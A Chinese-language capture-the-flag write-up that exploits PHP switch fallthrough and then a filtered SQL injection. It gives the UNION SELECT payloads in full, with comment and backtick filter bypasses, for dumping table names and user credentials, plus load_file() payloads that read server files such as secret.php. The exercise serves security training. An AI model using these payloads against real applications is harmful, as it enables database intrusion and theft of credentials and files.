打开环境，界面有一段代码

<?php
include("secret.php");

if(isset($_GET['c'])){
    $c = intval($_GET['c']);
    sleep($c);
    switch ($c) {
        case 1:
            echo '$url';
            break;
        case 2:
            echo '@A@';
            break;
        case 555555:
            echo $url;
        case 44444:
            echo "@A@";
            break;
        case 3333:
            echo $url;
            break;
        case 222:
            echo '@A@';
            break;
        case 222:
            echo '@A@';
            break;
        case 3333:
            echo $url;
            break;
        case 44444:
            echo '@A@';
        case 555555:
            echo $url;
            break;
        case 3:
            echo '@A@';
        case 6000000:
            echo "$url";
        case 1:
            echo '@A@';
            break;
    }
}

highlight_file(__FILE__);

如果没有break的话就会继续执行下去

这里传参?c=3会出现如下页面

访问这个php，有个输入框，感觉是sql注入

查看源代码，发现过滤了一些关键字

过滤的关键词有information_schema.tables，information_schema.columns，linestring，空格，polygon。在这里提供一种绕过的方法——反引号
反引号：它是为了区分MYSQL的保留字与普通字符而引入的符号。
例如information_schema.tables和information_schema.`tables`都可以使用。
网页的弹窗使得我们不容易观察，我们直接在源代码页面进行注入。

首先查询几列

?query=1/**/order/**/by/**/1#

发现只有一列

查询数据库名

-1/**/union/**/select/**/database()#

爆表名

-1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema='web'#

爆字段

-1/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.`columns`/**/where/**/table_name='content'# 

爆数据

-1/**/union/**/select/**/group_concat(id,username,password)/**/from/**/content#

我们发现数据库中并没有我们想要的flag，但是有一条提示tell you a secret,secert has a secret… 所以很有可能flag在secret.php中，现在就有一个问题，我们怎么从数据库中查看文件内容呢，mysql提供了读取本地文件的函数load_file()

-1/**/union/**/select/**/load_file('/var/www/html/secret.php')

 查看源代码，发现

那我们再获取一下/real_flag_is_here里的数据

-1/**/union/**/select/**/load_file('/real_flag_is_here')

 查看源代码，获得flag